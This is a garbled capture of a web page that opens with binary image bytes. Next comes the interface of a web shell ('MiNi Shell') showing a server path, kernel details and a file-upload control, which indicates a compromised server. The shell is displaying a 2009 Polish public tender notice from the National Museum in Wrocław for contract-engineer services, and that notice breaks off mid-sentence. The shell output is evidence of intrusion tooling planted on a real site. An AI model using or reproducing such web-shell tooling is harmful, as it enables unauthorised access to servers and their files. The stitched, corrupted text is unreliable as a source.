JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090304/49628-N-2009.html

<p class="kh_header"><b>Wrocław: Inżynier Kontraktu w ramach Projektu: Przebudowa poddasza nieużytkowego budynku głównego Muzeum Narodowego we Wrocławiu na prezentacje kolekcji sztuki współczesnej z uwzględnieniem dużego zespołu prac Magdaleny Abakanowicz</b><br>
<b>Numer ogłoszenia: 49628 - 2009; data zamieszczenia: 04.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe we Wrocławiu , Pl. Powstańców Warszawy 5, 50-153 Wrocław, woj. dolnośląskie, tel. 071 3435643, 3433308, faks 071 3725159.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mnwr.art.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Inżynier Kontraktu w ramach Projektu: Przebudowa poddasza nieużytkowego budynku głównego Muzeum Narodowego we Wrocławiu na prezentacje kolekcji sztuki współczesnej z uwzględnieniem dużego zespołu prac Magdaleny Abakanowicz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usługi Inżyniera Kontraktu w ramach Projektu: Przebudowa poddasza nieużytkowego budynku głównego Muzeum Narodowego we Wrocławiu na prezentacje kolekcji sztuki współczesnej z uwzględnieniem dużego zespołu prac Magdaleny Abakanowicz. 

Świadczący usługi Inżyniera Kontraktu zobowiązany będzie do zarządzania, kontroli i sprawowania nadzoru nad realizacją robot budowlanych w zakresie wszystkich specjalności, jakie są niezbędne do prowadzenia inwestycji w ramach przedmiotowego Projektu w oparciu o przepisy ustawy z dnia 07 lipca 1994 Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.).
 
Projekt - oznacza przedsięwzięcie (zadanie inwestycyjne) zatytułowane:Przebudowa poddasza nieużytkowego budynku głównego Muzeum Narodowego we Wrocławiu na prezentacje kolekcji sztuki współczesnej z uwzględnieniem dużego zespołu prac Magdaleny Abakanowicz, które  planowane jest  do współfinansowania:
1.	ze środków UE Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 priorytet 6: Wykorzystanie i promocja potencjału turystycznego i kulturowego Dolnego Śląska (Turystyka i Kultura),działanie: 6.4 - Turystka kulturowa,
2.	ze środków Programu Promesa Ministra Kultury i  Dziedzictwa Narodowego.
3.	ze środków budżetu Województwa Dolnośląskiego.

Szacunkowa wartość robót budowlanych planowanych do wykonania w ramach Projektu oscyluje wokół kwoty: 13 mln PLN netto (bez podatku VAT).


Szczegółowy opis przedmiotu zamówienia przedstawiony został w Załączniku nr 1 do niniejszej SIWZ - pn. Opis Przedmiotu Zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5, 72.22.40.00-1, 71.31.00.00-4, 71.30.00.00-1, 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 
10 000,00 zł (słownie: dziesięć tysięcy złotych zero groszy) do dnia 12 marca 2009 r. do godziny 10,00.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone  w art. 22 ust.1 pkt.1-4 ustawy Prawo zamówień publicznych oraz nie podlegają wykluczeniu z ubiegania się o zamówienie na podstawie art.24 ust.1 i 2 tej ustawy.

I. W przetargu mogą wziąć udział wykonawcy, którzy winni spełniać następujące wymagania:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
(w przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokumenty potwierdzające spełnianie warunku posiadania uprawnień, dołączone do Załącznika nr 1 Formularza ofertowego muszą być złożone dla każdego członka konsorcjum osobno).

2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawia pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, czyli: 
1)	Wykażą, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia wykonali należycie, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługi odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia tj. wykonali, co najmniej 1 usługę pełnienia funkcji Inżyniera Kontraktu (Inwestora Zastępczego) lub usługę równoważną polegającą na pełnieniu funkcji nadzoru inwestorskiego nad robotami budowlanymi na kontrakcie (zakończonym w 100%) obejmującym roboty budowlane w budynku użyteczności publicznej w zakresie budowy, adaptacji i remontów budynków, o budżecie nie mniejszym niż 13 000 000,00 PLN bez podatku VAT. Zakres wykonanej usługi musi obejmować nadzór nad następującymi robotami: ogólnobudowlanymi, instalacjami wodno-kanalizacyjnymi, c.o., wentylacyjnymi, elektrycznymi wysoko i nisko prądowymi (należy dołączyć wykaz wykonanych usług z wyszczególnieniem zakresu robót branżowych objętych tą usługą Inżyniera oraz określeniem wartości, daty i miejsca wykonania nadzorowanej inwestycji oraz dokumenty potwierdzające, że wskazana usługa Inżyniera Kontraktu została wykonana należycie - np. referencje).  Pod pojecie budynek użyteczności publicznej należy rozumieć budynek określony zgodnie z definicją budynku użyteczności publicznej zawartej w Rozporządzeniu Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie. 

3.	Wykażą, że dysponują lub przedstawiając pisemne zobowiązanie innego podmiotu będą dysponować dla potrzeb niniejszego zamówienia osobami zdolnymi do wykonania zamówienia, posiadającymi niezbędne do wykonania zamówienia kwalifikacje zawodowe i przedstawią informacje na temat tych kwalifikacji, a także zakresu wykonywania przez nich czynności: 
1)	wskażą do wykonania niniejszego zamówienia następujące osoby wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności:
a)	Ekspert nr 1 Kierownik Zespołu (Inżynier Rezydent) posiadający:
wykształcenie wyższe,
minimum 10-letnie doświadczenie zawodowe, w pełnieniu funkcji inspektora nadzoru robót budowlanych w tym na co najmniej jednym kontrakcie (zakończonym w 100%) obejmującym roboty budowlane realizowane w budynku użyteczności publicznej, o wartości kontraktu nie mniejszej niż 13 000 000,00 PLN bez podatku VAT; 
potwierdzenie odbycia, co najmniej 2-letniej praktyki zawodowej na budowie przy zabytkach nieruchomych (zgodnie z wymaganiami Rozporządzenia Ministra Kultury z 9 czerwca 2004 r. Dz.U. z 2004 r.Nr 150 poz.1579) lub posiadający uprawnienia do kierowania robotami na obiektach zabytkowych; 
uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej;
wpis na listę członków właściwej izby samorządu zawodowego zgodnie z przepisami ustawy Prawo Budowlane i ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001r. Nr 5 poz.42 z późn. zm.).
b)	Ekspert nr 2 Inspektor nadzoru w specjalności konstrukcyjno-budowlanej posiadający:
minimum 10-letnie doświadczenie zawodowe, w pełnieniu funkcji inspektora nadzoru robót budowlanych, w tym na co najmniej jednym kontrakcie (zakończonym) obejmującym roboty budowlane w zakresie budowy/modernizacji budynku użyteczności publicznej;
potwierdzenie odbycia, co najmniej 2-letniej praktyki zawodowej na budowie przy zabytkach nieruchomych (zgodnie z wymaganiami Rozporządzenia Ministra Kultury z 9 czerwca 2004 r. Dz.U. z 2004 r.Nr 150 poz.1579) lub posiadający uprawnienia do kierowania robotami na obiektach zabytkowych]; 
uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej;
wpis na listę członków właściwej izby samorządu zawodowego zgodnie z przepisami ustawy Prawo Budowlane i ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001r. Nr 5 poz.42 z późn. zm.).

c)	Ekspert nr 3 Inspektor nadzoru w specjalności sanitarnej posiadający:
minimum 10-letnie doświadczenie zawodowe w pełnieniu funkcji inspektora nadzoru robót z zakresu robót sanitarnych, w tym w co najmniej jednym budynku użyteczności publicznej o kubaturze nie mniejszej niż 10 000 m3,
uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
wpis na listę członków właściwej izby samorządu zawodowego zgodnie z przepisami ustawy Prawo Budowlane i ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001r. Nr 5 poz.42 z późn. zm.).

d)	Ekspert nr 4 Inspektor nadzoru w specjalności elektrycznej posiadający:
minimum 10-letnie doświadczenie zawodowe w pełnieniu funkcji inspektora nadzoru robót elektrycznych i elektroenergetycznych, w tym co najmniej na jednej inwestycji obejmującej roboty budowlane w budynku użyteczności publicznej o kubaturze nie mniejszej niż 10 000m3,
uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,
wpis na listę członków właściwej izby samorządu zawodowego zgodnie z przepisami ustawy Prawo Budowlane i ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001r. Nr 5 poz.42 z późn. zm.).

UWAGA:  
Zamawiający dopuszcza pełnienie przez 1 osobę jednocześnie funkcji Kierownika Zespołu (Ekspert nr 1) i funkcji Eksperta 2, pod warunkiem jednoczesnego posiadania odpowiedniego wykształcenia, doświadczenia i uprawnień. 

 (w przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, powyższe, szczegółowe warunki opisane w pkt. 2, 3 mogą być spełniane łącznie lub przez choćby  jednego z wykonawców tworzących konsorcjum - oceniana będzie ich łączna zdolność). 

4.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. 
1)	wykażą, że są ubezpieczeni od Odpowiedzialności Cywilnej w zakresie   prowadzonej działalności gospodarczej na kwotę przynajmniej: 1  000 000,00 PLN. 
2)	Posiadają środki finansowe lub zdolność kredytową w wysokości, co najmniej 200 000,00 PLN;
(w przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, warunek, opisany w pkt. 1 ) i  w pkt. 2) może być spełniony łącznie lub przez choćby jednego z wykonawców tworzących konsorcjum - oceniana będzie ich łączna zdolność). 

5.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów art. 24 ust. 1 lub 2.
(oświadczenie musi być podpisane przez osoby uprawnione. W przypadku oferty przez wykonawców ubiegających się wspólnie (konsorcjum) o udzielenie zamówienia, dokumenty potwierdzające spełnianie niniejszego warunku muszą być złożone dla każdego członka konsorcjum osobno a  oświadczenie stanowiące załącznik nr 1a  do oferty składa każdy ze Współwykonawców podpisane przez siebie  osobno).

II.	Zamawiający dokona oceny spełnienia powyższych warunków na podstawie oświadczeń lub dokumentów załączonych do oferty - według zasady spełnia lub nie spełnia. Warunki udziału w postępowaniu zostaną uznane za spełnione, jeżeli Wykonawca złoży dokumenty i oświadczenia, o których mowa w rozdz. IX SIWZ. Ocena złożonych oświadczeń i dokumentów obejmowała będzie ich badanie pod względem formalnoprawnym, a także czy informacje w nich zawarte potwierdzają spełnienie warunków określonych przez Zamawiającego.

III.	Wykonawcy zgodnie z art. 23 ustawy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wymagane jest:
1.	ustanowienie pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć oryginał pełnomocnictwa);
2.	złożenie wraz z ofertą, przez każdego Wykonawcę występującego wspólnie, oświadczenia o niepodleganiu wykluczeniu z postępowania (zał. nr 1a Formularza Ofertowego) oraz udokumentowanie, że razem spełniają wymagania art. 22 ust. 1 dotyczące wiedzy, doświadczenia, potencjału technicznego (wraz z dokumentami potwierdzającymi, zgodnie z zapisem w rozdz. IX SIWZ).
3.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie;
4.	Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy (art. 141 ustawy Pzp).
5.	Wszelka korespondencja prowadzona będzie z Wykonawcą występującym jako pełnomocnik pozostałych (Lider).
6.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przyjąć pisemne porozumienie wszystkich Wykonawców. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowną umowę cywilno-prawną (umowa Konsorcjum). Umowa ta powinna określać: zakres obowiązków każdego z Wykonawców przy realizacji Umowy z Zamawiającym, termin związania umową, na czas nie krótszy niż czas wynikający z Umowy z Zamawiającym, wskazanie Pełnomocnika, zapis o wspólnej i solidarnej odpowiedzialności w zakresie realizacji przedmiotu Umowy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Wykonawca jest zobowiązany złożyć wypełniony i podpisany FORMULARZ OFERTOWY, którego wzór załączony jest do niniejszej SIWZ oraz następujące dokumenty: 

1. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp zamawiający żąda złożenia wraz z ofertą: 

1)	Oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Pzp - Załącznik nr 1 Formularza Ofertowego. W przypadku oferty wspólnej Oświadczenie - Załącznik nr 1 składa Lider (Pełnomocnik) wskazany w pełnomocnictwie.

2)	Oświadczenia o niepodleganiu wykluczeniu, zgodnie z art. 24 ust. 1 i 2 ustawy Pzp - Załącznik nr 1a Formularza Ofertowego. W przypadku oferty wspólnej Oświadczenie - Załącznik nr 1a składa każdy Partner indywidualnie.

3)	Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m-cy przed upływem terminu składania ofert (dołączyć Załącznika nr 1 Formularza ofertowego w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawniona do reprezentacji Wykonawcy w obrocie gospodarczym). W przypadku wspólnego ubiegania się o udzielenie zamówienia dokument składa  każdy z uczestników (Partnerów);

4)	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków ofert (dołączyć do załącznika nr 1a do Formularza ofertowego);

5)	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (dołączyć do załącznika nr 1a do Formularza ofertowego);

6)	Oryginału pełnomocnictwa - dotyczy Wykonawców reprezentowanych przez pełnomocnika oraz Wykonawców składających wspólną ofertę (konsorcjum).
a)	dokument pełnomocnictwa dla osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów złożonych w ofercie,

b)	dokument pełnomocnictwa do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, podpisany przez uprawnionych, w świetle dokumentów rejestracyjnych, przedstawicieli Wykonawców.
UWAGA! W przypadku konsorcjum podmioty te są zobowiązane do ustanowienia pełnomocnika a także złożenia zapewnienia (zobowiązania), że za wykonanie umowy będą odpowiadać solidarnie i że przed podpisaniem umowy z Zamawiającym zawrą umowę regulującą zasady ich współpracy (dołączyć do załącznika nr 1 do oferty) - umowa taka może być zawarta już na etapie składania ofert; 
Pełnomocnictwo musi być załączone w oryginale i podpisane przez uprawnionych, w świetle dokumentów rejestracyjnych, przedstawicieli Wykonawców. Każde pełnomocnictwo powinno wskazywać pełnomocnika i zawierać następujące dane: nazwę przedmiotu zamówienia i Zamawiającego, podmiotu udzielającego pełnomocnictwa (tj. Wykonawcy), datę jego udzielenia oraz podpisy osób upoważnionych do reprezentowania danego Wykonawcy wg zasad określonych w dokumencie rejestrowym, a także informację o zakresie pełnomocnictwa (tj. czy zostało udzielone do reprezentowania w postępowaniu o udzielenie zamówienia, czy też do reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego).
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum), załączone pełnomocnictwo musi być podpisane przez wszystkich wykonawców, którzy tworzą konsorcjum.

2.	W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia, Wykonawcy zobowiązani są do przedłożenia wraz z ofertą: 

1)	Wykazu wykonanych usług pełnienia funkcji Inżyniera Kontraktu (Inwestora Zastępczego) lub usług równoważnych polegających na pełnieniu funkcji nadzoru inwestorskiego nad robotami budowlanymi na kontrakcie (zakończonym w 100%) obejmujących roboty budowlane w budynku użyteczności publicznej w zakresie budowy, adaptacji i remontów budynków, o budżecie nie mniejszym niż 13 000 000,00 PLN bez podatku VAT. Zakres wykonanej usługi musi obejmować nadzór nad następującymi robotami: ogólnobudowlanymi, instalacjami wodno-kanalizacyjnymi, c.o., wentylacyjnymi, elektrycznymi wysoko i nisko prądowymi (należy dołączyć wykaz wykonanych usług (co najmniej 1 usługi) z wyszczególnieniem zakresu robót branżowych objętych tą usługą Inżyniera Kontraktu oraz określeniem wartości, daty i miejsca wykonania nadzorowanej inwestycji - wypełnić zgodnie z podanym wzorem tabelę - Załącznik nr 3 Formularza Ofertowego).

2)	Dokumentów potwierdzających (np. referencje), że usługi Inżyniera Kontraktu wskazane w Załączniku nr 3 Formularza Ofertowego zostały wykonane należycie. UWAGA! Referencje i inne dokumenty potwierdzające, że wskazane usługi zostały wykonane należycie zgodnie z umową bez zastrzeżeń, terminowo oraz określać wartości, daty i miejsca wykonania nadzorowanych inwestycji.

3)	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą wykonywać niniejsze zamówienie (Ekspertów) wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia, wykształcenia niezbędnych do wykonania zamówienia i zgodnych z wymaganiami określonymi w Dziale VIII pkt. 3 SIWZ, a także zakresu wykonywanych przez nich czynności - należy wypełnić zgodnie z podanym wzorem tabelę - Załącznik nr 4 Formularza Ofertowego. 

4)	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 3. (tj. w Załączniku nr 4 do oferty), Wykonawca wskazał osoby, którymi będzie dysponował.

5)	Dokumenty potwierdzające posiadanie, przez wskazane osoby, które będą uczestniczyć w wykonaniu zamówienia, właściwych uprawnień wykonawczych do sprawowania samodzielnych funkcji w budownictwie oraz aktualne zaświadczenie o wpisie ww. osób na listę członków właściwej izby samorządu zawodowego (zaświadczenie wydane przez tę izbę, z określonym w nim terminem ważności); dołączyć, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do reprezentacji Wykonawcy w obrocie gospodarczym, do załącznika nr 4 Formularza Ofertowego.

6)	Dokument potwierdzający, że osoby: osoba posiadająca uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno - budowlanej i która pełnić będzie funkcję Kierownika Zespołu jako Ekspert nr 1oraz osoba posiadająca uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno - budowlanej i która jako Ekspert nr 2 pełnić będzie funkcję Kierownika robót konstrukcyjno-budowlanych, zgodnie z § 8 ust. 1 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. z 2004r. Nr 150, poz. 1579) odbyła, co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych (dokument wystawiony przez ówczesnego pracodawcę lub równoważne zaświadczenie wojewódzkiego konserwatora zabytków o kwalifikacjach do nadzorowania i kierowania robotami budowlanymi przy zabytkach nieruchomych); dołączyć do załącznika nr 4 do Formularza Ofertowego .

3.	W celu potwierdzenia opisanego przez zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia zamawiający żąda: 

1)	Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada podstawowy rachunek bankowy, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości, co najmniej 200 000,00 PLN, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania oferty.

2)	Polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności (wraz z oświadczeniem -zobowiązaniem - załącznikiem nr 5)  na kwotę przynajmniej 1 000 000,00 zł.  Jeśli polisa lub inny dokument ubezpieczeniowy obejmuje okres krótszy niż okres realizacji niniejszej umowy Wykonawca zobowiązany jest do złożenia (wraz z polisą) oświadczenia (załącznik nr 5), w którym Wykonawca zobowiązuje się do przedłużania polisy lub innego dokumentu ubezpieczeniowego na cały okres realizacji niniejszego zamówienia i będzie odnawiał ubezpieczenie w sposób ciągły pod rygorem wstrzymania płatności wynagrodzenia. Po wyborze Wykonawcy, Zamawiający przy podpisaniu umowy będzie wymagał złożenia aktualnej polisy ubezpieczenia OC lub innego dokumentu ubezpieczenia - na kwotę minimum 1 000 000,00 PLN w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia (w zakresie świadczenia usług stanowiących przedmiot zamówienia) i z okresem ważności obejmującym termin wykonania zamówienia. Polisa (lub 